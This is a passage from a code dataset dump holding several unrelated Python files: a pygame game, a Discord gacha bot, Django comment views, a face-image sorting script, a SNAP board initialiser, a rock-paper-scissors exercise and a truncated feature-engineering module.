pygame.image.load(\"alien2.png\")\nalien3 = pygame.image.load(\"alien3.png\")\nalien4 = pygame.image.load(\"alien4.png\")\nalien5 = pygame.image.load(\"alien5.png\")\nalien6 = pygame.image.load(\"alien6.png\")\n\n# Load baby image\nbaby = pygame.image.load(\"baby.png\")\n\n# Get the height and width for the hero, aliens, and baby\nhero_height = hero.get_height()\nhero_width = hero.get_width()\nalien_height = alien.get_height()\nalien_width = alien.get_width()\nbaby_width = baby.get_width()\nbaby_height = baby.get_height()\n\nprint(\"\\n===== Save The Baby! =====\\n\")\n\n# Give the hero a starting position - close to the centre of the screen\nheroXposition = 450\nheroYposition = 300\n\n# Give each alien a starting position - off the screen\nalienXposition = screen_width\nalienYposition = random.randint(0, screen_height - alien_height)\nalien2Xposition = -400\nalien2Yposition = random.randint(0, screen_height - alien_height)\nalien3Xposition = screen_width + 700\nalien3Yposition = random.randint(0, screen_height - alien_height)\nalien4Xposition = random.randint(0, screen_width - alien_width)\nalien4Yposition = screen_height + 100\nalien5Xposition = random.randint(0, screen_width - alien_width)\nalien5Yposition = -400\nalien6Xposition = random.randint(0, screen_width - alien_width)\nalien6Yposition = screen_height + 800\n\n# Give the baby a starting position - off the screen\nbabyXposition = screen_width + 400\nbabyYposiion = random.randint(0, screen_height - baby_height)\n\n# Give the hero, alien and baby a speed - amount of pixels by which they move\nhero_speed = 10\nalien_speed = 8\nbaby_speed = 6\n\n# Create while loop(the game loop)\ngaming = True\nwhile gaming:\n # Use time.delay to set how fast the screen should refresh\n pygame.time.delay(30)\n # Reset the screen after each loop\n screen.fill(black)\n # Blit the hero image on to the screen\n screen.blit(hero, (heroXposition, heroYposition))\n # Blit all alien images on to the screen\n screen.blit(alien, (alienXposition, alienYposition))\n screen.blit(alien2, (alien2Xposition, alien2Yposition))\n screen.blit(alien3, (alien3Xposition, alien3Yposition))\n screen.blit(alien4, (alien4Xposition, alien4Yposition))\n screen.blit(alien5, (alien5Xposition, alien5Yposition))\n screen.blit(alien6, (alien6Xposition, alien6Yposition))\n # Blit the baby image on to the screen\n screen.blit(baby, (babyXposition, babyYposiion))\n # Update the screen after every change that has happened\n pygame.display.update()\n # Create for loop for all events that will happen\n for event in pygame.event.get():\n # If the user clicks on the \"X\" the screen closes\n if event.type == pygame.QUIT:\n gaming = False\n # Use if statements to control what happens when each arrow is pressed\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and heroXposition > 0:\n heroXposition -= hero_speed\n if keys[pygame.K_RIGHT] and heroXposition < (screen_width - hero_width):\n heroXposition += hero_speed\n if keys[pygame.K_UP] and heroYposition > 0:\n heroYposition -= hero_speed\n if keys[pygame.K_DOWN] and heroYposition < (screen_height - hero_height):\n heroYposition += hero_speed\n # Control the direction and speed in which each alien moves across the screen\n alienXposition -= alien_speed\n alien2Xposition += alien_speed\n alien3Xposition -= alien_speed\n alien4Yposition -= alien_speed\n alien5Yposition += alien_speed\n alien6Yposition -= alien_speed\n # Control the direction and speed in which the baby moves across the screen\n babyXposition -= baby_speed\n # Create a \"box\" around the hero image\n hero_box = pygame.Rect(hero.get_rect())\n hero_box.top = heroYposition\n hero_box.left = heroXposition\n # Create a \"box\" around each alien image\n # If the hero \"box\" and \"alien\" box collide - close screen and print \"Killed by aliens.\"\n alien_box = pygame.Rect(alien.get_rect())\n alien_box.top = alienYposition\n alien_box.left = alienXposition\n\n if hero_box.colliderect(alien_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n\n alien2_box = pygame.Rect(alien2.get_rect())\n alien2_box.top = alien2Yposition\n alien2_box.left = alien2Xposition\n\n if hero_box.colliderect(alien2_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n\n alien3_box = pygame.Rect(alien3.get_rect())\n alien3_box.top = alien3Yposition\n alien3_box.left = alien3Xposition\n\n if hero_box.colliderect(alien3_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n\n alien4_box = pygame.Rect(alien4.get_rect())\n alien4_box.top = alien4Yposition\n alien4_box.left = alien4Xposition\n\n if hero_box.colliderect(alien4_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n\n alien5_box = pygame.Rect(alien5.get_rect())\n alien5_box.top = alien5Yposition\n alien5_box.left = alien5Xposition\n\n if hero_box.colliderect(alien5_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n\n alien6_box = pygame.Rect(alien6.get_rect())\n alien6_box.top = alien6Yposition\n alien6_box.left = alien6Xposition\n\n if hero_box.colliderect(alien6_box):\n print(\"\\n\\n>>> Killed by aliens.\\n\\n\")\n pygame.quit()\n # If the hero \"box\" collides with the baby \"box\" - close the screen and print \"You saved the baby!\"\n baby_box = pygame.Rect(baby.get_rect())\n baby_box.top = babyYposiion\n baby_box.left = babyXposition\n\n if hero_box.colliderect(baby_box):\n print(\"\\n\\n>>> You saved the baby!\\n\\n\")\n pygame.quit()\n # If the baby moves off the screen - close screen and print (\"The aliens caught the baby\")\n if babyXposition < 0 - baby_width:\n print(\"\\n\\nThe aliens caught the baby.\\n\\n\")\n pygame.quit()\n","sub_path":"Save_The_Baby.py","file_name":"Save_The_Baby.py","file_ext":"py","file_size_in_byte":6569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"462524258","text":"import os\nimport django\nfrom django.db.models import F\nimport discord\nfrom discord.ext import commands\nimport config\nfrom datetime import datetime\nfrom pytz import timezone\nfrom random import choices, uniform\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'web.config.settings')\ndjango.setup()\nfrom web.apps.items.models import Item, ItemStatRange\nfrom web.apps.gachas.models import TreasureBoxGacha\nfrom web.apps.users.models import DiscordUser, GachaInfo\n\n\nclass Gacha(commands.Cog):\n \"\"\"A cog for gacha commands\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n def is_treasure_box_channel(context):\n if config.DEBUG:\n return context.message.channel.id == '454890599410302977'\n else:\n return context.message.channel.id == '481712884196573194'\n\n @commands.command(aliases=['g', 'gs'])\n @commands.check(is_treasure_box_channel)\n async def gacha(self, context, job=None, rolls=None):\n \"\"\"MapleStory Mobile Treasure Box Gacha\"\"\"\n\n author = context.author\n prefix = self.bot.command_prefix\n command_name = context.invoked_with\n\n discord_user = self.check_user_in_db(author.id, author.name)\n\n if job is None:\n\n embed = discord.Embed(\n title=f'Cách quay rương và các lệnh liên quan',\n description=f'• **`{prefix}g`** **`{prefix}gs`** : hiện hướng dẫn này.\\n'\n f'• **`{prefix}g job`** : Quay rương 10+1 lần.\\n'\n f'• **`{prefix}gs job`** : Quay rương 1 lần.\\n'\n '`job` là tên viết tắt của Job muốn quay rương.\\n'\n f'• **`{prefix}glist`** : xem tên viết tắt của các Job có thể quay rương.\\n'\n f'• **`{prefix}gdaily`** : nhận 10,000 :gem: (Pha lê) để quay rương hằng ngày (reset vào 00:00 sáng).\\n'\n f'• **`{prefix}ginfo`** : xem thông tin rương đồ của mình.',\n color=discord.Color.teal())\n embed.add_field(\n name='Thông tin cần biết',\n value='• Quay rương 10+1 lần sẽ cần **1,000 :gem:**; Quay rương 1 lần sẽ cần **100 :gem:**.\\n'\n '• Tỷ lệ ra đồ dựa trên bảng tỷ lệ của Nexon, [xem tại đây](https://m.nexon.com/terms/353)\\n'\n '• Chỉ số của item sẽ **ngẫu nhiên** trong khoảng Min - Max của item đó.\\n'\n '[**Credits to Lukishi**](https://docs.google.com/spreadsheets/d/1zEix7SJoHMyqKJxxheUtluKLOEmwtfgTJwXENZHsEoY/htmlview)\\n'\n '• Các món đồ có nền (Emblem) không đủ dữ kiện, nên sẽ tạm tính chỉ số Min - Max **bằng 130%** so với item không có nền\\n'\n '• Tỷ lệ ra nền chưa xác định, nên sẽ tạm cho là **10%**.')\n embed.add_field(\n name='Ví dụ',\n value=f'• Quay rương 10+1 cho Dark Knight: **`{prefix}g dk`**\\n'\n f'• Quay rương 1 cho Bishop: **`{prefix}gs bs`**\\n'\n f'Có thể dùng tên job viết liền (không dấu cách) để quay rương:\\n**`{prefix}g darkknight`**',)\n await context.say_as_embed(embed=embed)\n\n else:\n if command_name == 'g':\n rolls = 11\n min_cr = 1000\n elif command_name == 'gs':\n rolls = 1\n min_cr = 100\n\n # inform the user that they don't have enough crystals for gacha to work\n if rolls:\n if discord_user.gacha_info.crystal_owned < min_cr:\n embed = discord.Embed(\n title=f'Không thể quay rương, số :gem: không đủ',\n description=f'{author.mention}, bạn đang có {discord_user.gacha_info.crystal_owned} :gem:.'\n f' Cần tối thiểu {\"{:,}\".format(min_cr)} :gem: để quay rương.\\n'\n f'Nhập lệnh `{prefix}gdaily` để nhận :gem: hằng ngày nhé!',\n color=discord.Color.teal())\n await context.say_as_embed(embed=embed)\n return\n # take 1,000 crystals from the user's balance\n else:\n discord_user.gacha_info.crystal_owned = F('crystal_owned') - min_cr\n discord_user.gacha_info.crystal_used = F('crystal_used') + min_cr\n\n # process job given by the user\n if job.lower() in ['dk', 'darkknight']:\n job_processed = 'Dark Knight'\n elif job.lower() in ['bm', 'bowmaster']:\n job_processed = 'Bowmaster'\n elif job.lower() in ['bs', 'bis', 'bish', 'bishop']:\n job_processed = 'Bishop'\n elif job.lower() in ['nl', 'nightlord']:\n job_processed = 'Night Lord'\n elif job.lower() in ['cs', 'cor', 'sair', 'corsair']:\n job_processed = 'Corsair'\n elif job.lower() in ['dw', 'dawnwarior']:\n job_processed = 'Dawn Warrior'\n elif job.lower() in ['wa', 'windarcher']:\n job_processed = 'Wind Archer'\n elif job.lower() in ['bw', 'blazewizard']:\n job_processed = 'Blaze Wizard'\n elif job.lower() in ['nw', 'nightwalker']:\n job_processed = 'Night Walker'\n elif job.lower() in ['tb', 'thunderbreaker']:\n job_processed = 'Thunder Breaker'\n else:\n embed = discord.Embed(\n title=f'Không tìm được Job với cụm: {job}',\n description=f'Vui lòng thử lại với *tên viết tắt của Job* hoặc *tên đầy đủ không dấu cách*.',\n colour=discord.Color.teal())\n await context.say_as_embed(embed=embed)\n return\n\n gacha_items = TreasureBoxGacha.objects.filter(job__job=job_processed)\n rate = []\n for item in gacha_items:\n rate.append(item.rate)\n\n if rolls == 1:\n result = choices(gacha_items, rate, k=rolls)\n else:\n result = choices(gacha_items, rate, k=rolls - 1)\n\n # for guaranteed unique item with multi rolls\n guaranteed = gacha_items.filter(rank__rank='Unique')\n uresult = choices(guaranteed)[0]\n result.append(uresult)\n\n # randomly give Emblem to Unique/Legendary items with the rate of 10%\n # items with Emblem have an increase of stats of 30%\n emblem = ['(Emblem)', None]\n weights = [0.1, 0.9]\n emblem_stat_increase = 0.3\n # populate this to show the result in discord embed\n display_result = []\n # populate this to count number of items per rank\n rank_counts = []\n\n # process the result for final data display\n for gacha in result:\n\n sub_type = gacha.item.sub_type\n job = gacha.item.job\n rank = gacha.rank\n\n rank_counts.append(rank.rank)\n\n display_data = {\n 'rank': rank.rank,\n 'sub_type': sub_type.sub_type,\n 'stat': {}\n }\n\n # give some emotes to distinguish item types\n if sub_type.type.type == 'Weapon':\n display_data.update({'name': f':crossed_swords: {gacha.item.name}'})\n elif sub_type.type.type == 'Armor':\n display_data.update({'name': f':shield: {gacha.item.name}'})\n elif sub_type.type.type == 'Armor':\n display_data.update({'name': f':ring: {gacha.item.name}'})\n else:\n display_data.update({'name': gacha.item.name})\n\n # randomize stats\n stats = gacha.item.stats.all()\n for stat in stats:\n try:\n stat_range = ItemStatRange.objects.get(sub_type=sub_type, rank=rank, stat=stat, job=job)\n except ItemStatRange.DoesNotExist:\n # print(f'Not recognized stat: {stat}. Please check ItemStatRange data.')\n continue\n stat_amount = uniform(stat_range.min, stat_range.max)\n display_data['stat'].update({stat.stat: round(stat_amount)})\n\n # add emblem\n if gacha.rank.rank in ['Unique', 'Legendary']:\n\n # rank decorator based on rank\n if gacha.rank.rank == 'Unique':\n display_data['rank'] += ' :orange_book:'\n else:\n display_data['rank'] += ' :green_book:'\n\n em = choices(emblem, weights)[0]\n # increase emblem item count and modify stats\n if em:\n display_data['name'] += f' {em}'\n for key, value in display_data['stat'].items():\n display_data['stat'][key] = round(value * (1 + emblem_stat_increase))\n\n if gacha.rank.rank == 'Unique':\n discord_user.gacha_info.unique_emblem_item_count = F('unique_emblem_item_count') + 1\n elif gacha.rank.rank == 'Legendary':\n discord_user.gacha_info.legendary_emblem_item_count = F('legendary_emblem_item_count') + 1\n display_result.append(display_data)\n\n # count items based on ranks\n item_rank_count = [0, 0, 0, 0]\n for item in rank_counts:\n if item == 'Rare':\n item_rank_count[0] += 1\n elif item == 'Epic':\n item_rank_count[1] += 1\n elif item == 'Unique':\n item_rank_count[2] += 1\n elif item == 'Legendary':\n item_rank_count[3] += 1\n\n # update the user gacha info\n discord_user.gacha_info.rare_item_count = F('rare_item_count') + item_rank_count[0]\n discord_user.gacha_info.epic_item_count = F('epic_item_count') + item_rank_count[1]\n discord_user.gacha_info.unique_item_count = F('unique_item_count') + item_rank_count[2]\n discord_user.gacha_info.legendary_item_count = F('legendary_item_count') + item_rank_count[3]\n\n # make text to inform the user of items obtained\n text_item_rank_count = f'Rare: `{item_rank_count[0]}` | Epic: `{item_rank_count[1]}` | '\n text_item_rank_count += f'Unique: `{item_rank_count[2]}` | Legendary: `{item_rank_count[3]}`'\n\n if rolls == 1:\n desr = f'Job: {job_processed}'\n else:\n desr = f'Job: {job_processed}\\n {text_item_rank_count}'\n\n embed = discord.Embed(\n title=f'Kết quả mở Treasure Box {rolls} lần của [{author.display_name}]',\n description=desr,\n colour=discord.Color.teal())\n\n for item_result in display_result:\n text_info = f'Rank: **{item_result[\"rank\"]}**\\nType: **{item_result[\"sub_type\"]}**\\nStat:\\n'\n for key, value in item_result['stat'].items():\n text_info += f'+ **{key}: {value}**\\n'\n embed.add_field(\n name=item_result['name'],\n value=text_info)\n\n discord_user.gacha_info.save()\n discord_user.gacha_info.refresh_from_db()\n crystals = '{:,}'.format(discord_user.gacha_info.crystal_owned)\n embed.set_footer(\n text=f'Bạn còn [💎 x{crystals}] trong tài khoản.',\n icon_url='https://i.imgur.com/Sh9kXA8.png')\n await context.say_as_embed(embed=embed)\n\n @commands.command(name='glist')\n @commands.check(is_treasure_box_channel)\n async def gachalist(self, context):\n prefix = self.bot.command_prefix\n job_abbrs = [\n ('Dark Knight', 'dk'),\n ('Bowmaster', 'bm'),\n ('Bishop', 'bs'),\n ('Night Lord', 'nl'),\n ('Corsair', 'cs'),\n\n ('Dawn Warrior', 'dw'),\n ('Wind Archer', 'wa'),\n ('Blaze Wizard', 'bw'),\n ('Night Walker', 'nw'),\n ('Thunder Breaker', 'tb'),\n\n ]\n\n author = context.author\n self.check_user_in_db(author.id, author.name)\n\n text_job_abbrs = 'Viết tắt | Tên Job\\n'\n for job in job_abbrs:\n text_job_abbrs += f'{job[1]} : {job[0]}\\n'\n\n embed = discord.Embed(\n title='Danh sách Job và các tên viết tắt dùng để quay rương',\n description=f'```{text_job_abbrs}```\\n'\n f'**Lệnh quay rương**\\n'\n f'• `{prefix}gs viết_tắt` (1 lần)\\n'\n f'• `{prefix}g viết_tắt` (10+1 lần)\\n'\n f'Ví dụ quay rương 10+1 lần cho Dark Knight: `{prefix}g dk`\\n',\n colour=discord.Color.teal())\n await context.send(embed=embed)\n\n @commands.command(name='gdaily')\n @commands.check(is_treasure_box_channel)\n async def gachadaily(self, context):\n\n author = context.author\n discord_user = self.check_user_in_db(author.id, author.name)\n\n # check if user already redeemed crystals\n if discord_user.gacha_info.daily_checked():\n embed = discord.Embed(\n title=None,\n description='Bạn đã nhận :gem: hôm nay rồi nhé. Vui lòng thử lại **sau 00:00 sáng mai**.',\n colour=discord.Color.teal())\n await context.send(embed=embed)\n return\n\n # gives the user crystals\n vn_tz = timezone('Asia/Ho_Chi_Minh')\n discord_user.gacha_info.daily_check = datetime.now().astimezone(vn_tz)\n discord_user.gacha_info.crystal_owned = F('crystal_owned') + 10000\n discord_user.gacha_info.save()\n\n discord_user.gacha_info.refresh_from_db()\n crystals = '{:,}'.format(discord_user.gacha_info.crystal_owned)\n\n embed = discord.Embed(\n title=None,\n description=f'{author.mention} đã nhận :gem: x10,000 vào tài khoản quay rương!\\n'\n f'Hiện tại bạn đang có **:gem: x{crystals}**.',\n colour=discord.Color.teal())\n await context.send(embed=embed)\n\n @commands.command(name='ginfo')\n @commands.check(is_treasure_box_channel)\n async def gachainfo(self, context):\n\n author = context.author\n\n # check for user in db, create one if not present\n discord_user = self.check_user_in_db(author.id, author.name)\n gacha_info = discord_user.gacha_info\n\n # add thousand separator\n owned = '{:,}'.format(gacha_info.crystal_owned)\n used = '{:,}'.format(gacha_info.crystal_used)\n\n embed = discord.Embed(\n title=f'Thông tin rương đồ của {author.display_name}',\n description=None,\n colour=discord.Color.teal())\n embed.add_field(\n name='Pha lê',\n value=f'• Đang có: :gem: x**{owned}**\\n• Đã dùng: :gem: x**{used}**',\n inline=False)\n embed.add_field(\n name='Rương đồ',\n value=f'• Rare: **{gacha_info.rare_item_count}**\\n'\n f'• Epic: **{gacha_info.epic_item_count}**\\n'\n f'• Unique: **{gacha_info.unique_item_count}** (**{gacha_info.unique_emblem_item_count}** món có nền (Emblem))\\n'\n f'• Legendary: **{gacha_info.legendary_item_count}** (**{gacha_info.legendary_emblem_item_count}** món có nền (Emblem))\\n',\n inline=False)\n\n # check for daily Crystal redemption\n if discord_user.gacha_info.daily_checked() is True:\n text_daily_checked = 'Đã nhận hôm nay.'\n else:\n text_daily_checked = f'Chưa nhận, dùng lệnh `{self.bot.command_prefix}gdaily` để nhận :gem:.'\n embed.add_field(\n name='Nhận 💎 hằng ngày',\n value=text_daily_checked)\n # set the thumbnail image for better visualizations\n embed.set_thumbnail(url='https://i.imgur.com/Sj2rPTN.png')\n await context.send(embed=embed)\n\n def check_user_in_db(self, user_id, user_name):\n discord_user, created = DiscordUser.objects.get_or_create(discord_id=user_id, defaults={'discord_name': user_name})\n gacha_info, created = GachaInfo.objects.get_or_create(discord_user=discord_user)\n return discord_user\n\n @gacha.error\n @gachalist.error\n @gachadaily.error\n @gachainfo.error\n async def gacha_error(self, error, context):\n print(error)\n return\n\n\ndef setup(bot):\n bot.add_cog(Gacha(bot))\n","sub_path":"francis/cogs/old/gacha.py","file_name":"gacha.py","file_ext":"py","file_size_in_byte":17542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"539721224","text":"import json\nfrom uuid import uuid4\nfrom user.models import Users\nfrom post.models import Posts\nfrom comment.models import Comments\nfrom lifesnap.util import JSONResponse\nfrom django.views import View\nfrom django.http import HttpRequest\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\nclass CommentCreate(View):\n \"\"\" Create a comment for a post\n required json object {\n 'postid': the id of the post to comment,\n 'userid': the user id of the author of the comment,\n 'message': the comment itself\n }\n returned json object {\n 'commentid': the new comment id\n }\n \"\"\"\n def post(self, request: HttpRequest):\n try:\n req_json = json.loads(request.body.decode('UTF-8'))\n except json.JSONDecodeError:\n return JSONResponse.new(code=400, message='json decode error, bad data sent to the server')\n\n message = req_json.get('message')\n if message is None or len(message) > 255:\n return JSONResponse.new(code=400, message='message bad data: {}'.format(message))\n\n try:\n post = Posts.objects.get(post_id__exact=req_json.get('postid'))\n user = Users.objects.get(user_id__exact=req_json.get('userid'))\n except ObjectDoesNotExist:\n return JSONResponse.new(code=400, message='post {} or user {} was not found'.format(req_json.get('postid'), req_json.get('userid')))\n\n if user.is_active is False:\n return JSONResponse.new(code=400, message='user id {} must be logged in'.format(user.user_id))\n\n comment = Comments()\n comment.comment_id = uuid4().time_mid\n comment.author_id = user.user_id\n comment.author_name = user.user_name\n comment.message = message\n comment.save()\n post.comments_set.add(comment)\n\n return JSONResponse.new(code=200, message='success', commentid=comment.comment_id)\n\n\nclass CommentDelete(View):\n \"\"\" Delete a comment from a post\n required json object {\n 'userid': the id of the user who owns the comment,\n 'commentid': the id of the comment to delete\n }\n \"\"\"\n def post(self, request: HttpRequest):\n try:\n req_json = json.loads(request.body.decode('UTF-8'))\n except json.JSONDecodeError:\n return JSONResponse.new(code=400, message='json decode error, bad data sent to the server')\n\n try:\n user = Users.objects.get(user_id__exact=req_json.get('userid'))\n comment = Comments.objects.get(comment_id__exact=req_json.get('commentid'))\n except ObjectDoesNotExist:\n return JSONResponse.new(code=400, message='user {} or comment {} is not found'.format(req_json.get('userid'), req_json.get('commentid')))\n\n if user.is_active is False:\n return JSONResponse.new(code=400, message='user id {} must be logged in'.format(user.user_id))\n\n if user.user_id != comment.author_id:\n return JSONResponse.new(code=400, message='user {} is not the authoer of comment {}'.format(user.user_id, comment.author_id))\n\n comment.delete()\n return JSONResponse.new(code=200, message='success', commentid=comment.comment_id)\n\n\n\nclass CommentLike(View):\n \"\"\" Return or update the like count for the comment\n GET: returned json object {\n 'count': the like count\n }\n POST: required json object {\n 'userid': the user id of the user who is liking the comment,\n 'commentid': the comment the user is liking\n }\n POST: returned json object {\n 'count': the new like count\n }\n \"\"\"\n def get(self, request: HttpRequest, commentid: str):\n commentid = int(commentid)\n\n try:\n comment = Comments.objects.get(comment_id__exact=commentid)\n except ObjectDoesNotExist:\n return JSONResponse.new(code=400, message='comment id {} is not found'.format(commentid))\n\n return JSONResponse.new(code=200, message='success', count=comment.like_count)\n\n def post(self, request: HttpRequest):\n try:\n req_json = json.loads(request.body.decod('UTF-8'))\n except json.JSONDecodeError:\n return JSONResponse.new(code=400, message='json decode error, bad data sent to the server')\n\n try:\n user = User.objects.get(user_id__exact=req_json.get('userid'))\n comment = Comments.objects.get(comment_id__exact=req_json.get('commentid'))\n except ObjectDoesNotExist:\n return JSONResponse.new(code=400, message='userid {} or commentid {} is not found'.format(req_json.get('userid'), req_json.get('commentid')))\n\n if user.is_active is False:\n return JSONResponse.new(code=400, message='user id {} must be logged in'.format(user.user_id))\n\n comment.like_count += 1\n comment.save()\n return JSONResponse.new(code=200, message='success', count=comment.like_count)\n","sub_path":"comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"43285700","text":"import glob\nimport tqdm\nimport os\nimport numpy as np\nimport argparse\nimport cv2\nimport shutil\nimport logging\n\nlogging.getLogger().setLevel(logging.INFO)\n\nfrom retinaface.retina_detector import RetinaDetector\nfrom PIL import Image\n\nparser = argparse.ArgumentParser(description='Retinaface')\nparser.add_argument('-m', '--trained_model', default='/home/pdd/Desktop/workspace/Valid_face_dataset/retinaface/weights/mobilenet0.25_Final.pth',\n type=str, help='Trained state_dict file path to open')\nparser.add_argument('--vis-thres', default=0.5, type=float, help='visualization_threshold')\nparser.add_argument('--padding', type=int, default=5, help=\"padding to detect cropped face\")\nparser.add_argument('--invalid-out-path', default=\"/home/pdd/Desktop/workspace/Valid_face_dataset/new_dataset/fake\", help=\"path to cropped face of real dtset\")\nargs = parser.parse_args()\n\nif __name__==\"__main__\":\n detector = RetinaDetector('cpu', args.trained_model, verbose=True)\n input_folder = \"new_dataset/real/*.jpg\"\n fake_idx = len(os.listdir(\"/home/pdd/Desktop/workspace/Valid_face_dataset/new_dataset/fake\"))\n os.makedirs(args.invalid_out_path, exist_ok=True)\n\n for idx, img_path in tqdm.tqdm(enumerate(glob.glob(input_folder))):\n img = np.array(Image.open(img_path))\n dets = detector.detect_from_image(img)\n for b in dets:\n if b[4] < args.vis_thres:\n continue\n b = list(map(int, b))\n h, w, _ = img.shape\n if b[0] - args.padding < 0 or b[2] + args.padding > h or b[1] - args.padding < 0 or b[3] + args.padding > w:\n shutil.move(img_path, os.path.join(args.invalid_out_path, \"{}.jpg\".format(fake_idx)))\n fake_idx+=1\n break\n\n # os.makedirs(\"./new_dataset/real\", exist_ok=True)\n # os.makedirs(\"./new_dataset/fake\", exist_ok=True)\n # [shutil.copy(img_path, \"./new_dataset/real/{}.jpg\".format(idx)) \\\n # for idx, img_path in tqdm.tqdm(enumerate(glob.glob(\"new_dataset/*/real*.jpg\")))]\n # [shutil.copy(img_path, \"./new_dataset/fake/{}.jpg\".format(idx)) \\\n # for idx, img_path in tqdm.tqdm(enumerate(glob.glob(\"new_dataset/*/fake*.jpg\")))]\n #fake 17670 real 21269 18967","sub_path":"invalid_detect.py","file_name":"invalid_detect.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"332062491","text":"import snap_board\nimport logging\nimport sys\n\ndef cmd_tool(args=None):\n from argparse import ArgumentParser\n p = ArgumentParser(description='snap_init HOST BOF_FILE [OPTIONS]')\n p.add_argument('host', type=str, default='', help='specify the host name')\n p.add_argument('bof', type=str, default='', help='specify the bof file to load unto FPGA')\n p.add_argument('-d', '--demux', dest='demux_mode', type=int, default=2,\n help='Set demux mode 1/2/4') # add the explanation of different demux modes\n p.add_argument('-g', '--gain', dest='gain', type=int, default=1,\n help='Possible gain values (choose one): { 1 1.25 2 2.5 4 5 8 10 12.5 16 20 25 32 50 }, default is 1')\n p.add_argument('-k', '--katcp_port', dest='katcp_port', type=int, default=7147,\n help='KATCP port to use (default 7147)')\n p.add_argument('-c', '--chips', nargs='+', dest='chips', type=str, default='all',\n help='Input chips you wish to calibrate. Default all chips: a b c.')\n p.add_argument('-s', '--silent', action='store_true', default=False,\n help='Silence all logging info.')\n p.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Verbose mode, for debugging.')\n \n try:\n args = p.parse_args()\n except:\n p.print_help()\n sys.exit(0)\n \n # define an ADC16 class object and pass it keyword arguments\n s = snap_board.SnapBoard(args.host, args.katcp_port, uses_adc=True, timeout=10)\n \n if args.verbose:\n s.logger.setLevel(logging.DEBUG)\n s.adc.logger.setLevel(logging.DEBUG)\n elif not args.silent:\n s.logger.setLevel(logging.INFO)\n s.adc.logger.setLevel(logging.INFO)\n \n if not args.silent:\n print(\"Programming %s with %s\" % (args.host, args.bof))\n \n s.program(boffile=args.bof, \n chips=args.chips, \n demux_mode=args.demux_mode, \n gain=args.gain)\n \n if not args.silent:\n print(\"DONE.\")\n\n\nif __name__ == \"__main__\":\n cmd_tool()\n","sub_path":"snap_control/snap_init.py","file_name":"snap_init.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"517310580","text":"import random\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\n# Write your code below this line 👇\n\n\"\"\"\n Roles for Rock, Paper and Scissors\n * Rock wind against scissors\n * Scissors win against paper\n * Paper wins against rock\n\"\"\"\n\n\nimages = [rock, paper, scissors]\n\nchose = int(input(\"Whaat do you chose? Type 0 for Rock, 1 for Paper or 2 for Scissors\\n\"))\n\nif chose >= 3 or chose < 0:\n print(\"You typed an invalid number, you lose!\")\nelse:\n\n print(images[chose])\n\n # ambos os limites estão inclusos. Tando o inicio como o fim\n computer_chose = random.randint(0, 2)\n print(\"Computer chose\")\n print(images[computer_chose])\n\n \"\"\"\n As combinações que encontrei:\n 0-2 2-0\n 0-1 1-0\n 1-2 2-1\n 2-0 0-2\n \"\"\"\n\n # 0-2 2-0\n if chose == 0 and computer_chose == 2:\n print(\"You win\")\n elif chose == 2 and computer_chose == 0:\n print(\"You lose\")\n\n # \"\"\"\n # Lembre-se, aqui será satisfeita apenas uma opção. Não é multi-if. Ou seja, se um if for satisfeito, o programa não\n # ira continuar testando o restante. Pois se encontrar um if que o satisfaça, ele ira o executar.\n\n # Desta forma, se passou pelos testes anteriores e não foram satisfeitos, não será feito novamente.\n\n # As condições anteriores tratam das comparações entre 2 e 0, e 0 e 2. Logo, se chegou até aqui, é obvio que não será uma\n # comparação entre 2 e 0 ou 0 e 2, porque se fossem, não teriam chegado até aqui. Logo, trato de opções diferentes.\n # \"\"\"\n\n elif chose > computer_chose:\n print(\"You win\")\n elif chose < computer_chose:\n print(\"You lose\")\n elif chose == computer_chose:\n print(\"It's a draw\")","sub_path":"Courses/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022/Day_4/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"136623359","text":"from modules import config\r\nfrom modules.feature_engineering import helpers\r\n\r\n\r\ndef sequence_end_feat(data):\r\n # get only the numbers\r\n numbers = data[config.NUM_LIST]\r\n feat_list = []\r\n for i, row in numbers.iterrows():\r\n row_list = sorted([row[n] for n in config.NUM_LIST])\r\n feat_list += [helpers.get_sequence_end(row_list)]\r\n data[config.SEQ_END] = feat_list\r\n return data\r\n\r\n\r\ndef max_same_colour_count_feat(data):\r\n # get only the colours\r\n colours = data[config.CLR_LIST]\r\n feat_list = []\r\n for i, row in colours.iterrows():\r\n row_list = [row[c] for c in config.CLR_LIST]\r\n feat_list += [helpers.get_max_same_colour_count(row_list)]\r\n data[config.SAME_CLR] = feat_list\r\n return data\r\n\r\n\r\ndef max_values_count_feat(data):\r\n # get only the numbers\r\n numbers = data[config.NUM_LIST]\r\n feat_list = [[]] * 2\r\n feat_list[0] = []\r\n feat_list[1] = []\r\n for i, row in numbers.iterrows():\r\n row_list = [row[n] for n in config.NUM_LIST]\r\n temp1, temp2 = helpers.max_values_count_feat_count(row_list)\r\n feat_list[0] += 